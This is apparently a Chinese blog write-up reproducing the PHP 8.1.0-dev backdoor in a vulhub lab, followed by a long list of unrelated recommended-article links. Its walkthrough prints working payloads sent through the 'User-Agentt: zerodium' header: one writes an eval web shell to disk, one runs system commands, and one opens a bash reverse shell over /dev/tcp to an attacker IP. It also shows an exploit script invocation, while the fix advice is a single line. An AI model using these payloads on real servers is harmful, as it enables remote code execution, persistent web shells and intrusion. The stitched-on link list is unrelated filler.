PHP 8.1.0-dev后门复现
0x01 简介
PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。
0x02 影响版本
PHP 8.1.0-dev
0x03 环境搭建
使用vulhub进行搭建:
cd vulhub/php/8.1-backdoor
sudo docker-compose up -d
访问主页:
http://ip:8080
0x04 漏洞复现
后门存在于user-agentt:zerodium字段,后面加上相应的php函数,得到执行结果:
我们再来查看phpinfo(),通过浏览器插件Modify Header,点击Open options page,修改该网站的Headers:
再来执行写入shell:
User-Agentt: zerodiumfile_put_contents('indes.php','<?php eval($_POST["xx11"]);?>');
连接成功:
执行命令:
User-Agentt: zerodiumsystem("id");
反弹shell:
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/IP/8000 0>&1'");
EXP:
python3 PHP-8.1.0-dev-Backdoor-RCE.py -u http://ip:8080 -c id
exp后台回复php-8.1.0-dev获取。
0x05修复建议
1、建议更换版本
长按下方图片关注我们:
PHP 8.1.0-dev后门复现相关推荐
- npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! test_vue_0613@1.0.0 dev: 错误的解决方法
npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! test_vue_0613@1.0.0 dev: 错误的解决方法 参考文章: (1)npm ERR ...
- device:GPU:0 but available devices are [ /job:localhost/replica:0/task:0/dev
device:GPU:0 but available devices are [ /job:localhost/replica:0/task:0/dev 解决方法: sess = tf.Sess ...
- @1.0.0 dev: `webpack-dev-server --inline --progress --config
以前写的工作室官网项目,本来能运行起来的,隔了很久之后,中间还重做了一次系统,今天重新运行竟然运行不起来了. 报错: Matrix-official@1.0.0 dev: `webpack-dev-s ...
- metinfov5.0.4漏洞复现
metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简 ...
- vue端口号被占用报错npm ERR! @1.0.0 dev: `node build/dev-server.js`
本群面相web开发爱好者以及同行,共同探讨研究技术,分享交流经验,帮助新人成长,大牛技术精进,js发展日新月异闭门造车是没有出路的,有问必答,共同进步.求职招聘qq群 626448857 附前后端技术 ...
- npm ERR! code ELIFECYCLEnpm ERR! errno 1npm ERR! wlwl-dsfvue@1.0.0 dev: `node build/dev-server.js`报错
npm run dev报错如下 internal/modules/cjs/loader.js:883 throw err; ^ Error: Cannot find module '../co ...
- vue:hadoop@1.0.0 dev: `webpack-dev-server --inline --progress --config build/webpack.dev.conf.js
运行vue项目是报错: hadoop@1.0.0 dev: `webpack-dev-server --inline --progress --config build/webpack.dev.con ...
- 记一次前端启动报错npm ERR! 12@1.0.0 dev: `webpack-dev-server --inline --progress --config build/webpack.dev.c
问题: npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! 12@1.0.0 dev: `webpack-dev-server --inline -- ...
- PR、巴西烤肉、iis6.0提权复现
PR.巴西烤肉.iis6.0提权复现 大多数的时候,如果我们上传了一句话木马之后,想要进一步操作.比如,创建新用户,查看当前身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限, ...
- 在终端输入npm run serve时出现npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! test_vue_0613@1.0.0 dev: 错误的
最近遇到了一个问题,废了我九牛二虎之力终于给他解决了,原因竟然是这个 有的人用的是用的是mac,有的人用的是windows,所以苹果系统有时候为了兼容会安装一些依赖包 (比如:fsevents),而有 ...
最新文章
- Mysql数据库按照varchar字符串类型排序和按照int整型类型排序的区别和注意点及解决方案...
- html左侧分级导航,jquery实现无限分级横向导航菜单的方法
- Tomcat启动过程中找不到JAVA_HOME解决方法
- 狼人杀服务器维护时间,狼人杀官 方将于11月30日进行停机维护
- 在实践中使用延迟队列
- 剑指Offer - 面试题15. 二进制中1的个数(位运算)
- AJAX实现瀑布流布局
- java8的下载与安装(网上教程的安装方法)
- 数据库系统概念第七版(Database System Concepts 7th)课后习题答案英文版
- 从创业者角度看《印度合伙人 Padman》后的一点感受
- 学3D建模,都需要哪些基础?
- 中国茶道的基本精神(转)
- 内外兼修:程序员的成长之路+软技能 代码之外的生存指南
- CSS圆角边框、盒子阴影、文字阴影(01-07课)
- mongodb 基于3千万条数据, 查询30万结果集,分页问题
- 矩阵的乘法口诀(一)
- hackmyvm-bunny walkthrough
- vsftp配置详解篇
- mysql md5 多少位_mysql的MD5加密后的字符能不能设定长度
- GNSS/INS松组合算法原理简介
热门文章
- 红米2 com.android.phone,红米2手机(移动/联通/电信) 7.1 ROM 下载地址搬运(2017年3月10日更新)...
- python输出好看的表格
- 计算机本科生科研训练计划表,大学本科生科研训练计划(srtp)(10页)-原创力文档...
- 微信小程序开发和APP开发有哪些区别
- 原生小程序 申请小程序 - 发布流程
- 开工大吉 | Cocos Store 精品资源推荐
- 24点计算器问题[C++实现]
- 手机怎样设置一个高考倒计时便签,可以天天看见那种
- linux之打包压缩(tar,gz,bz2,xz,zip)
- oracle计算sql运行时间,如何计算正在运行的SQL已经执行的时间?